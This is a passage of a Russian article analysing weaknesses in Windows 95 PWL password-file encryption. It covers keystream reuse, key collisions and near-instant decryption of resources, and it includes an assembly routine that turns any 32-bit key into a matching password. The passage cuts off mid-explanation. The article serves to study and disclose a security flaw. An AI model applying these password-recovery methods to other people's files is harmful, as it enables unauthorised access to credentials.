Первое&#160; слово&#160; каждой&#160; записи&#160; представляет&#160; собой<br />&#160; &#160; &#160; &#160;длину записи, включая и это слово. Признаком конца цепочки записей<br />&#160; &#160; &#160; &#160;является&#160; нулевое&#160; слово. Таким образом пустой ресурс - это просто<br />&#160; &#160; &#160; &#160;нулевое слово. Тогда ясно, что если PWL-файл имеет длину 606 байт,<br />&#160; &#160; &#160; &#160;то все ресурсы в нем пустые, т.к. 23Eh + 16*2 = 25Eh = 606. Каждый<br />&#160; &#160; &#160; &#160;ресурс зашифрован гаммой, которая&#160; накладывается,&#160; начиная&#160; с&#160; его<br />&#160; &#160; &#160; &#160;начала.</p> <p>PWL-файл&#160; шифруется&#160; простым гаммированием, гамма генерируется алгоритмом<br />RC4.&#160; При&#160; первой&#160; регистрации&#160; пользователя&#160; запрашивается&#160; пароль.&#160; &#160;Он<br />приводится к верхнему регистру и сворачивается в ключ (двойное слово). Из<br />этого ключа порождается гамма (псевдослучайная последовательность нулей и<br />единиц).&#160; Эта&#160; гамма&#160; сложением&#160; по модулю два накладывается на каждый из<br />ресурсов&#160; с&#160; его&#160; начала&#160; и&#160; &#160;зашифровывает&#160; &#160;их.&#160; &#160;Аналогично&#160; &#160;ресурсам<br />зашифровывается&#160; поле&#160; 208h-23Dh, где хранится имя пользователя и таблица<br />указателей на начала ресурсов.</p> <p>При&#160; последующих&#160; регистрациях данным пользователем запрашивается пароль.<br />Он приводится к верхнему регистру, опять сворачивается в ключ из которого<br />опять порождается&#160; гамма.&#160; Если&#160; этой&#160; гаммой&#160; имя&#160; пользователя&#160; в&#160; поле<br />208h-21Bh&#160; расшифровывается&#160; правильно,&#160; то&#160; пароль&#160; считается&#160; введенным<br />правильно. После&#160; чего&#160; расшифровываются&#160; таблица&#160; указателей&#160; на&#160; начала<br />ресурсов&#160; и&#160; сами&#160; ресурсы&#160; PWL-файла. Расшифровка производится вторичным<br />наложением&#160; гаммы&#160; сложением&#160; по&#160; модулю&#160; два&#160; (используется&#160; обратимость<br />сложения по модулю два, то есть тот факт, что (X XOR Y) XOR Y = X ). Если<br />имя&#160; пользователя&#160; не&#160; расшифровывается&#160; правильно,&#160; то&#160; пароль считается<br />неправильным.&#160; Таким&#160; образом&#160; проверка&#160; правильности&#160; введенного&#160; пароля<br />производится&#160; по&#160; совпадению первых 20-и байт порожденной из него гаммы с<br />первыми 20-ю байтами гаммы от правильного пароля.</p> <p>Этот&#160; &#160; алгоритм&#160; &#160;определения&#160; &#160;подлинности&#160; &#160;пароля&#160; &#160;является&#160; &#160;весьма<br />оригинальным, т.к. при этом нигде не сохраняется ни зашифрованный пароль,<br />ни хеш-функция (необратимое преобразование) пароля. Но, в то-же время, на<br />удивление, нелепо реализованным. Ведь поскольку имя пользователя известно<br />ЗАРАНЕЕ, то первые 20 байт гаммы тривиально вычисляются. Но,&#160; т.к.&#160; ТА-ЖЕ<br />гамма&#160; &#160;накладывается&#160; на&#160; каждый&#160; ресурс&#160; (отсутствие&#160; смены&#160; гаммы&#160; при<br />шифровании разных полей - это основная ошибка применения алгоритма RC4&#160; в<br />данном&#160; случае), то можно расшифровать и первые 20 байт каждого ресурса !<br />PWL-файл имеет избыточную информацию - есть указатели на начала ресурсов,<br />но есть и длины записей в ресурсах и из одного&#160; можно&#160; вычислять&#160; другое.<br />Если в ресурсах не более одной записи, то длина ресурса есть первое слово<br />ресурса плюс два (длина первой записи ресурса плюс длина нулевого слова).<br />Определяя&#160; &#160;по&#160; &#160;началу&#160; &#160;и&#160; длине&#160; данного&#160; ресурса&#160; начало&#160; следующего,<br />рассчитывается&#160; &#160;вся&#160; &#160;таблица&#160; указателей&#160; на&#160; начала&#160; ресурсов&#160; в&#160; поле<br />21Ch-23Dh. В результате еще 2*17 = 34 байта&#160; добавляются&#160; к&#160; рассчитанной<br />гамме.&#160; Если&#160; в ресурсах более одной записи, то начало следующего ресурса<br />все равно можно найти с&#160; некоторой&#160; долей&#160; вероятности&#160; (после&#160; наложения<br />гаммы второй байт ресурса будет равен второму&#160; байту&#160; гаммы,&#160; т.к.&#160; длина<br />записей&#160; в&#160; ресурсе&#160; редко&#160; превышает 255, а 0 XOR X = X ). Этот алгоритм<br />реализован в известной программе Glide, которая&#160; рассчитывает&#160; 54&#160; первых<br />байта гаммы и расшифровывает по 54 первых байта каждого&#160; ресурса.&#160; Причем<br />немедленно и без какого либо перебора&#160; вариантов,&#160; что&#160; сводит&#160; прочность<br />системы&#160; шифрования&#160; Win95&#160; к&#160; НУЛЮ&#160; (под&#160; прочностью&#160; системы шифрования<br />понимается количество вариантов,&#160; которые&#160; необходимо&#160; перебрать&#160; для&#160; ее<br />гарантированного&#160; вскрытия). Между тем, достаточно было накладывать гамму<br />на ресурсы, не используя первых засвеченных ее байт, чтобы такой огромной<br />прорехи не было.</p> <p>Алгоритм генерации ключа по паролю (c) Microsoft<br />&#160; &#160; &#160; Имеем Key - двойное слово и пароль до 20-и символов.<br />&#160; &#160;1) Обнулить Key.<br />&#160; &#160;2) Привести&#160; пароль&#160; к&#160; верхнему регистру&#160; (русские буквы приводятся к<br />&#160; &#160; &#160; верхнему регистру в Альтернативной кодировке).<br />&#160; &#160;3) Для каждого символа пароля, начиная с первого :<br />&#160; &#160; &#160; &#160; а) прибавить код символа к Key<br />&#160; &#160; &#160; &#160; б) повернуть Key влево 7 раз.<br />&#160; &#160;4) На прощание еще раз вращать Key влево 7 раз.<br />&#160; &#160; &#160; (программистам&#160; на Си этот шаг можно не делать, считая, что нулевой<br />&#160; &#160; &#160; &#160;байт, завершающий строку с паролем, тоже является его&#160; символом&#160; и<br />&#160; &#160; &#160; &#160;повторить цикл 3 на один раз больше)<br />&#160; &#160;Ключ&#160; используется&#160; для инициализации генератора псевдослучайных чисел<br />&#160; &#160;(алгоритма RC4). Для каждого ключа RC4&#160; порождает&#160; уникальную&#160; битовую<br />&#160; &#160;последовательность (гамму).</p> <p>Алгоритм&#160; сопоставления&#160; ключа&#160; паролю&#160; слаб тем, что при выбранной длине<br />ключа в двойное слово,&#160; множество&#160; различных&#160; ключей&#160; (2^32)&#160; оказывается<br />неизмеримо&#160; &#160;меньше&#160; &#160;множества&#160; различных&#160; паролей.&#160; Это&#160; означает,&#160; что<br />существуют пароли, которые Win95 не&#160; отличает&#160; друг&#160; от&#160; друга.&#160; Например<br />пароли&#160; &quot;ARJEW&quot;&#160; и&#160; &quot;QRJEV&quot;&#160; свернутся&#160; в&#160; один&#160; и тот-же ключ A8B6:C694,<br />породят одну и ту-же гамму и поэтому для Win95 полностью эквивалентны ! В<br />пароле могут использоваться 100 различных символов (26 латинских&#160; букв&#160; +<br />10 цифр + 32 спецсимвола + 32 русские буквы). Отсюда<br />1+100+100^2+100^3+100^4+...+100^14 ~ 100^14 = 10^28 - множество различных<br />паролей от пустого до 14-символьных.<br />2^32 = 4*((2^10)^3) ~ 4*((10^3)^3) = 4*10^9 - множество различных ключей.<br />(здесь&#160; везде ~ - примерно равно).<br />Т.е.&#160; множество&#160; возможных&#160; ключей&#160; на&#160; много&#160; порядков&#160; меньше множества<br />возможных паролей. Это делает&#160; совершенно&#160; бессмысленными&#160; допускаемые&#160; в<br />Win95&#160; длинные&#160; пароли.&#160; Поскольку&#160; 2^32&#160; &lt;&#160; 100^5 , то эффективная длина<br />пароля соответствует только ПЯТИ символам ! Это,&#160; правда,&#160; совершенно&#160; не<br />означает, что для каждого пароля найдется пятисимвольный эквивалент, т.к.<br />множество&#160; паролей при таком алгоритме очень неравномерно отображается на<br />множество&#160; ключей.&#160; Но мне удалось построить алгоритм, который для любого<br />значения ключа немедленно, то есть&#160; без&#160; перебора,&#160; вычисляет&#160; подходящий<br />девятисимвольный&#160; &#160; пароль&#160; &#160; из&#160; &#160; следующего&#160; &#160;множества&#160; &#160;символов&#160; &#160;-<br />&quot;@ABCDEFGJKNOPQRSTUVWX&quot;. Так что доказано,&#160; что&#160; ЛЮБОМУ&#160; паролю&#160; в&#160; Win95<br />найдется&#160; эквивалент&#160; не длиннее ДЕВЯТИ символов ! Поэтому задавать более<br />длинные пароли совершенно бессмысленно !</p> <p>Пустому паролю соответствует нулевое значение ключа. Возникает интересная<br />задача:&#160; существует-ли&#160; пароль,&#160; который&#160; бы Win95 не отличала от пустого<br />пароля&#160; ?&#160; Удивительно,&#160; но&#160; существует&#160; !!!&#160; &#160;Мне&#160; &#160;удалось&#160; &#160;найти&#160; &#160;16<br />девятисимвольных таких паролей, состоящих из одних латинских букв. Из них<br />наиболее&#160; симпатичный &quot;FFFFKKKKL&quot;. Также нашел 8 восьмисимвольных с одним<br />специальным сиволом &quot;{&quot; - например &quot;FFFO{KKL&quot; или&#160; &quot;GGGO{CCD&quot;&#160; и&#160; поэтому<br />менее красивых. Более короткие такие пароли невозможны.</p> <p>Алгоритм синтеза пароля по ключу (c) Иванов А.Р.<br />PRINT_PASSWORD&#160; PROC&#160; &#160; NEAR</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;На входе DX:AX - ключ<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;Печатает девятисимвольный пароль на станд. выход<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;Пароль состоит из символов @ABCDEFGJKNOPQRSTUVWX<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;Портит AX BX CX DX SI</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; PUSH&#160; &#160; DS<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; PUSH&#160; &#160; CS<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; POP&#160; &#160; &#160;DS<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;Masks[8],0010111B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;CX,32-14<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; CALL&#160; &#160; ROL_DW<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;BX,0000000001010100B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; TEST&#160; &#160; DX,DX<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; JNZ&#160; &#160; &#160;@@2<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; CMP&#160; &#160; &#160;AX,BX<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; JNE&#160; &#160; &#160;@@1&#160; &#160; &#160; &#160; &#160; &#160; &#160;;Jcc не меняют флагов<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; INC&#160; &#160; &#160;Masks[8]&#160; &#160; &#160; &#160; ;INC не меняет флага переноса<br />@@1:&#160; &#160; &#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;BX,CX&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;CX=0<br />@@2:&#160; &#160; &#160; &#160; &#160; &#160; SUB&#160; &#160; &#160;AX,0010101000000000B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;DX,0100101010010101B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;AX,BX<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;DX,CX&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;CX=0<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;AX,CX&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;CX=0<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;SI,8<br />Implant:&#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;BL,AL<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; AND&#160; &#160; &#160;BL,Masks[SI]<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; OR&#160; &#160; &#160; Password[SI],BL<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;CL,32-7&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;CH=0<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; CALL&#160; &#160; ROL_DW<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; DEC&#160; &#160; &#160;SI<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; JNS&#160; &#160; &#160;Implant&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;Цикл 9 раз<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;DX,OFFSET Password<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MOV&#160; &#160; &#160;AH,9&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;Вывод строки 9-й<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; INT&#160; &#160; &#160;21h&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;функцией MS-DOS<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; POP&#160; &#160; &#160;DS<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; RET</p> <p>&#160; &#160; &#160; &#160; ;Подпрограмма вращает двойное слово DX:AX влево CX раз<br />ROL_DW:&#160; &#160; &#160; &#160; &#160;SHL&#160; &#160; &#160;AX,1<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; RCL&#160; &#160; &#160;DX,1<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ADC&#160; &#160; &#160;AL,CH&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;CH=0<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; LOOP&#160; &#160; ROL_DW<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; RET&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;;На выходе CX=0</p> <p>PassWord&#160; &#160; &#160; &#160; DB&#160; &#160; &#160; 1000010B,1000010B,1000010B,1000010B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; DB&#160; &#160; &#160; 1000000B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; DB&#160; &#160; &#160; 1000000B,1000000B,1000000B,1000000B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; DB&#160; &#160; &#160; '$'</p> <p>Masks&#160; &#160; &#160; &#160; &#160; &#160;DB&#160; &#160; &#160; 0001101B,0001101B,0001101B,0001101B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; DB&#160; &#160; &#160; 0001111B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; DB&#160; &#160; &#160; 0010111B,0010111B,0010111B,?</p> <p>PRINT_PASSWORD&#160; ENDP</p> <p>То,&#160; что&#160; множество&#160; возможных&#160; значений&#160; ключей&#160; много&#160; меньше множества<br />различных значений паролей, означает, что среднее время&#160; необходимое&#160; для<br />расшифровки&#160; чужого&#160; PWL-файла можно значительно снизить, если перебирать<br />не пароли, а ключи. Оптимизированная по быстродействию функция&#160; алгоритма<br />RC4&#160; может&#160; вычисляться&#160; со&#160; скоростью&#160; 50000&#160; crypt/sec на машине класса<br />Pentium-166.&#160; Если&#160; вычислять&#160; с&#160; такой&#160; скоростью,&#160; то&#160; 2^32&#160; &#160;вариантов<br />перебираются&#160; менее,&#160; чем&#160; за&#160; сутки.&#160; Подобрав&#160; ключ, можно без перебора<br />сгенерировать&#160; подходящий&#160; пароль.&#160; Этот&#160; алгоритм&#160; реализован&#160; &#160;в&#160; &#160;моей<br />программе&#160; PWL_Key.&#160; Таким образом вся система шифрования PWL-файла может<br />ГАРАНТИРОВАННО вскрыта МЕНЕЕ, ЧЕМ ЗА СУТКИ !!!</p> <p>Поскольку&#160; Win95&#160; не&#160; ограничивает длину пароля снизу, то короткие пароли<br />легко подбирает программа PWL_Hack Владимира Калашникова.&#160; В&#160; силу&#160; того,<br />что для Win95 существуют неразличимые пароли, PWL_Hack может, с некоторой<br />долей&#160; вероятности,&#160; быстро&#160; подобрать&#160; короткий пароль-аналог, даже если<br />настоящий&#160; пароль&#160; был достаточно длинным и не представлял собой слово из<br />словаря. Отсюда следует, что собственно оценить слабым или&#160; нет&#160; является<br />пароль,&#160; по&#160; его внешнему виду, в Win95, невозможно. И невозможны никакие<br />рекомендации по выбору надежных паролей. Например,&#160; достаточно&#160; надежный,<br />на&#160; &#160;первый&#160; &#160;взгляд,&#160; пароль&#160; &quot;gfFo{CkL&quot;&#160; вообще&#160; соответствует&#160; полному<br />отсутствию какого-бы то ни было пароля !</p> <p>Криптосистема&#160; Win95&#160; производит&#160; удручающее&#160; впечатление,&#160; прежде&#160; всего<br />нелепым&#160; применением&#160; криптоалгоритма&#160; RC4.&#160; Ведь&#160; Glide&#160; &#160;расшифровывает<br />приличные&#160; куски или, иногда, даже весь PWL-файл, не перебирая варианты и<br />даже НИ РАЗУ не вычисляя криптографической функции. Более того,&#160; алгоритм<br />программы&#160; Glide&#160; вообще&#160; никак не зависит от способа генерации гаммы, то<br />есть от RC4.&#160; Надо же&#160; умудриться&#160; применить&#160; криптоалгоритм&#160; ТАК,&#160; чтобы<br />прочность&#160; системы&#160; шифрования от этого криптоалгоритма не зависела НИКАК<br />!!! Именно поэтому RC4 здесь и не рассматривается.&#160; Это&#160; вполне&#160; надежный<br />криптоалгоритм, ну и что с того ? Криптосистема Win95 не может обеспечить<br />даже&#160; минимума&#160; безопасности ! Вероятно, по принципу : раз Win95 - ОС для<br />домохозяек, то и защита в ней тоже от домохозяек.</p> <p>--------------------------------------------------------------------------------</p> <p>Приложение, добавленное к статье по просьбам первых ее читателей<br />с обьяснением моего алгоритма, синтезирующего пароль по ключу,<br />но тем, кто не пишет программы сам, оно может быть не интересно<br />Все люди,&#160; которым&#160; я&#160; показывал&#160; набросок&#160; этой&#160; статьи&#160; советовали&#160; мне<br />переписать&#160; мой&#160; алгоритм&#160; на Си, но, во первых, я не считаю Си признаком<br />хорошего тона, а во вторых от этого ничего не стало бы понятнее.&#160; Ну,&#160; не<br />выражается&#160; этот&#160; алгоритм&#160; в&#160; ПОНЯТИЯХ ЯЗЫКОВ ВЫСОКОГО УРОВНЯ ! Никак не<br />выражается.&#160; Все,&#160; конечно,&#160; допускает&#160; имитацию,&#160; но&#160; &#160;гораздо&#160; полезнее<br />попытаться&#160; обьяснить смысл совершаемых операций, тем более, что алгоритм<br />является&#160; простейшим&#160; примером&#160; обращения&#160; односторонней&#160; &#160;функции&#160; &#160;(так<br />называемого&#160; построения&#160; коллизии&#160; этой&#160; функции).&#160; Но&#160; сначала&#160; придется<br />сделать&#160; лирическое&#160; отступление&#160; об&#160; односторонних&#160; функциях&#160; (one&#160; &#160;way<br />functions) этого типа. Не вполне строгое, но помогающее ухватить суть.</p> <p>Односторонняя&#160; функция имеет обратную. Но если прямая функция вычисляется<br />легко&#160; (представима&#160; в&#160; виде&#160; совокупности&#160; элементарных&#160; операций),&#160; &#160;то<br />обратную&#160; через&#160; элементарные операции выразить невозможно или еще никому<br />не удалось, т.е. она может быть представлена только в виде&#160; таблицы.&#160; Но,<br />если&#160; таблица требует астрономического количества записей (например 2^128<br />~ 3*10^28 записей для 128-битной односторонней функции), то ее построение<br />нереально. Тогда единственным способом вычислить эту функцию&#160; в&#160; обратную<br />сторону&#160; &#160;для&#160; &#160;какого-то&#160; &#160;конкретного&#160; значения&#160; является&#160; многократное<br />вычисление&#160; ее&#160; в&#160; прямую&#160; сторону,&#160; перебирая&#160; все&#160; возможные&#160; &#160;значения<br />аргумента,&#160; вплоть&#160; до&#160; совпадения&#160; с этим значением. Этот метод перебора<br />вариантов называется атака Brute force, т.е. штурм грубой силой. Но, если<br />количество возможных вариантов астрономическое, то и время на этот&#160; штурм<br />требуется&#160; соответствующее (например в среднем 2^128/10000/60/60/24/365/2<br />~ 5*10^17 лет для 128-битной односторонней&#160; функции,&#160; вычисляемой&#160; ЭВМ&#160; в<br />прямую&#160; сторону 10000 раз в секунду). То есть односторонняя функция - это<br />функция,&#160; которая&#160; имеет&#160; обратную,&#160; но&#160; вычисление&#160; обратной&#160; лежит&#160; &#160;за<br />пределами&#160; &#160;вычислительных&#160; &#160;возможностей,&#160; хотя&#160; в&#160; прямую&#160; сторону&#160; она<br />вычисляется легко и быстро. Каждый бит результата&#160; односторонней&#160; функции<br />представляет&#160; собой черезвычайно сложную логическую функцию от каждого из<br />битов аргумента. Поэтому построение&#160; коллизии&#160; -&#160; это&#160; почти&#160; безнадежная<br />задача, решением которой можно гордиться.</p> <p>Односторонние&#160; функции&#160; широко&#160; применяются&#160; в&#160; системах&#160; аутентификации.<br />Пароли пользователей хранятся в виде результата применения к&#160; нему&#160; такой<br />функции.&#160; &#160; Такой&#160; &#160;результат&#160; &#160;называется&#160; &#160;хешированным&#160; &#160;паролем&#160; &#160;или<br />хеш-значением пароля (например второе поле файла /etc/passwd в Unix - это<br />хеш, помещенный туда при последней смене пароля).&#160; При&#160; проверке&#160; пароля,<br />хеш-значение,&#160; вычисляемое&#160; от введенного пароля, сравнивается с хранимым<br />хеш-значением от правильного пароля. При их совпадении&#160; пароль&#160; считается<br />правильным.&#160; Даже&#160; если&#160; хеш-значение удалось украсть, прямо вычислить из<br />него пароль невозможно в силу односторонности его получения. Поэтому&#160; все<br />парольные&#160; крякеры действуют, вычисляя хеш-функцию в лоб и тупо перебирая<br />варианты паролей или пробуя слова из словаря. Но вот если бы&#160; хеш-функцию<br />удалось обратить ... :)</p> <p>В&#160; Win95&#160; длина&#160; ключа&#160; выбрана малой - 32 бита. Поэтому возможен быстрый<br />подбор правильного ключа перебором вариантов. Если бы ключ&#160; получался&#160; из<br />пароля&#160; хорошей односторонней функцией, то вычислить правильный пароль из<br />правильного ключа было бы невозможно, иначе&#160; как&#160; полным&#160; перебором&#160; всех<br />паролей.&#160; Но&#160; функция получения ключа ИЗЛИШНЕ ПРОСТА, чтобы не попытаться<br />построить ей&#160; обратную.&#160; Если&#160; это&#160; удастся,&#160; то&#160; можно&#160; будет&#160; вычислять<br />подходящий пароль сразу после быстрого подбора правильного ключа.</p> <p>Посмотрим,&#160; как&#160; влияют&#160; биты&#160; символов&#160; пароля&#160; на&#160; биты&#160; ключа&#160; при его<br />формировании. (для простоты забудем о русских буквах&#160; в&#160; пароле&#160; и&#160; будем<br />считать его символы 7-битными).</p> <p>0000 0000 0000 0000 0000 0000 0000 0000 - пустой пароль<br />0000 0000 0001 1111 1100 0000 0000 0000 - 1-символьный пароль<br />0000 1111 1112 2222 2200 0000 0000 0000 - 2-символьный пароль<br />1111 2222 2223 3333 3300 0000 0000 0111 - 3-символьный пароль<br />2222 3333 3334 4444 4400 0011 1111 1222 - 4-символьный пароль<br />(здесь&#160; ненулевыми&#160; цифрами&#160; обозначены&#160; биты соответствующего символа, а<br />нулями - нулевые биты)<br />Пока биты просто вставляются в ключ и друг на друга не влияют.</p> <p>Но&#160; &#160;дальше&#160; биты&#160; начинают&#160; накладываться&#160; друг&#160; на&#160; друга&#160; сложением&#160; и<br />взаимовлиять друг на друга.</p> <p>3333 4444 4445 5551 1111 1122 2222 2333 - 5-символьный пароль<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 5 55</p> <p>4444 5555 1111 1112 2222 2233 3333 3444 - 6-символьный пароль<br />&#160; &#160; &#160; &#160; &#160; 5556 6666 66</p> <p>5111 1111 2222 2223 3333 3344 4444 4555 - 7-символьный пароль<br /> 555 6666 6667 7777 77</p> <p>1222 2222 3333 3334 4444 4455 5511 1111 - 8-символьный пароль<br />6666 7777 7778 8888 88&#160; &#160; &#160; &#160; &#160; 55 5666</p> <p>2333 3333 4444 4445 5551 1111 1122 2222 - 9-символьный пароль<br />7777 8888 8889 9999 99 5 5566 6666 6777</p> <p>Для удобства рассуждений повернем ключ от&#160; 9-символьного&#160; пароля&#160; 14&#160; раз<br />вправо - вот так :<br />5111 1111 2222 2223 3333 3344 4444 4555<br /> 555 6666 6667 7777 7788 8888 8999 9999</p> <p>Все&#160; &#160;биты&#160; ключа&#160; от&#160; 9-символьного&#160; пароля,&#160; за&#160; исключением&#160; старшего,<br />получаются как результат&#160; сложения&#160; двух&#160; бит&#160; от&#160; разных&#160; символов&#160; плюс<br />переносы&#160; от&#160; предыдущих&#160; разрядов. А что если фиксировать некоторые биты<br />символов пароля так, чтобы эти символы заведомо были латинскими буквами в<br />верхнем регистре ? Например так :</p> <p>-100 --1- 100- -1-1 00-- 1-10 0--1 -100<br /> --- 10-0 ---1 0-0- --10 -0-- -10- 0---<br />(здесь 0 и 1 - нулевые и единичные биты)</p> <p>За счет фиксированных бит символы пароля смогут быть только такими :<br />1-4 символ&#160; 100--1-&#160; BCFGJKNO<br />5 символ&#160; &#160; 100----&#160; @ABCDEFGHIJKLMNO<br />6-9 символ&#160; 10-0---&#160; @ABCDEFGPQRSTUVW<br />&#160; (от использования &quot;@&quot; мне избавиться не удалось). :(</p> <p>Варьируя 32 остальных бита символов пароля, мы сможем получить&#160; любые&#160; 32<br />бита&#160; ключа,&#160; т.к. каждому биту ключа мы сопоставили один ФИКСИРОВАННЫЙ и<br />один ВАРЬИРУЕМЫЙ бит, т.е. оставили&#160; для&#160; каждого&#160; бита&#160; ключа&#160; по&#160; ОДНОЙ<br />СТЕПЕНИ&#160; &#160;СВОБОДЫ.&#160; &#160;Это&#160; &#160;предположение,&#160; &#160;как&#160; оказалось&#160; на&#160; практике,<br />выполняется с одним исключением - две комбинации варьируемых бит&#160; рождают<br />один и тот-же ключ, а для ключа 0015:0000 подходящей комбинации вообще не<br />находится.&#160; Пришлось&#160; подобрать&#160; для&#160; него&#160; подходящий пароль &quot;GGGOKCCCX&quot;<br />вручную.</p> <p>Прибавление каждого кода символа пароля к ключу можно&#160; считать&#160; состоящим<br />из&#160; двух&#160; сложений : фиксированных бит и вырьируемых бит. Тогда, вычтя из<br />ключа фиксированные биты, мы получим&#160; варьируемые&#160; и&#160; соберем&#160; пароль&#160; из<br />конкретных символов (из множества &quot;@ABCDEFGJKNOPQRSTUVWX&quot;).</p> <p>Беда&#160; в&#160; том,&#160; что&#160; при&#160; формировании&#160; ключа помимо сложения используется<br />операция вращения. Постараемся&#160; от&#160; нее&#160; избавиться,&#160; чтобы&#160; формирование<br />ключа выглядело как совокупность одних сложений. Можно перестать думать о<br />вращениях, если ввести совершенно безумное понятие КОЛЬЦЕВОГО ЧИСЛА, т.е.<br />последовательности&#160; бит,&#160; завернутой&#160; в&#160; колечко. Прибавление константы к<br />кольцевому числу будет выглядеть так :<br />&#160; &#160; &#160; &#160; ADD&#160; &#160; &#160;EAX,Constant&#160; &#160; ;кольцевое сложение -&#160; &quot;ADD + ADC&quot;<br />&#160; &#160; &#160; &#160; ADC&#160; &#160; &#160;EAX,0&#160; &#160; &#160; &#160; &#160; &#160;;благодаря команде &quot;ADC ноль&quot; перенос<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;перелетает из конца в начало числа<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;перенос не может уйти еще на один<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ;круг, поэтому одного ADC достаточно<br />Колечко можно считать неподвижным, а биты символов пароля перед сложением<br />сдвигать на соответствующие места.</p> <p>При попытке разобраться в свойствах этих битовых&#160; колечек,&#160; обнаружилось,<br />что&#160; &#160;0(кольцевое)&#160; &#160;+&#160; &#160;1&#160; &#160;=&#160; &#160;1(кольцевое),&#160; &#160;но&#160; &#160;с&#160; &#160;другой&#160; стороны<br />FFFFFFFF(кольцевое) + 1 = 1(кольцевое) тоже !!! После такого&#160; открытия&#160; у<br />автора&#160; этих&#160; строк&#160; медленно&#160; поехала&#160; крыша и только этим состоянием он<br />может&#160; обьяснить&#160; успешный&#160; результат.&#160; Во&#160; всяком&#160; &#160;случае,&#160; &#160;дальнейшие<br />рассуждения носят явно нездоровый характер :)</p> <p>Пусть&#160; вначале&#160; было&#160; кольцо&#160; из&#160; 32-х нулевых бит. Тогда коды первых 7-и<br />символов пароля будут прибавлены к этому кольцу кольцевым сложением, если<br />их биты предварительно сдвинуть на соответствующие позиции вот так :<br />5111 1111 2222 2223 3333 3344 4444 4555<br /> 555 6666 6667 7777 77</p> <p>Но, при прибавлениях 8 и 9-го символов (и только&#160; при&#160; них&#160; -&#160; это&#160; можно<br />доказать) возможен перенос за пределы двойного слова, который теряется. В<br />колечке&#160; появляется&#160; разрыв.&#160; Чтобы учесть это обстоятельство, представим<br />себе кольцевое число с&#160; ловушкой&#160; для&#160; переноса.&#160; Пусть&#160; между&#160; какими-то<br />битами кольцевого числа расположена ловушка. Если в нее попадает перенос,<br />то&#160; он гибнет и далее не распространяется. Пусть такой перенос называется<br />RIP-переносом&#160; (светлая&#160; ему&#160; память).&#160; :)&#160; Тогда&#160; восьмой&#160; символ&#160; будет<br />добавлен к ключу кольцевым сложением, если ловушка расположена между 6-ым<br />и 7-ым битами, а биты символа предварительно сдвинуты так :<br />0000 0000 0000 0000 0088 8888 8000 0000<br />Девятый&#160; символ&#160; будет&#160; добавлен обычным сложением, которое можно считать<br 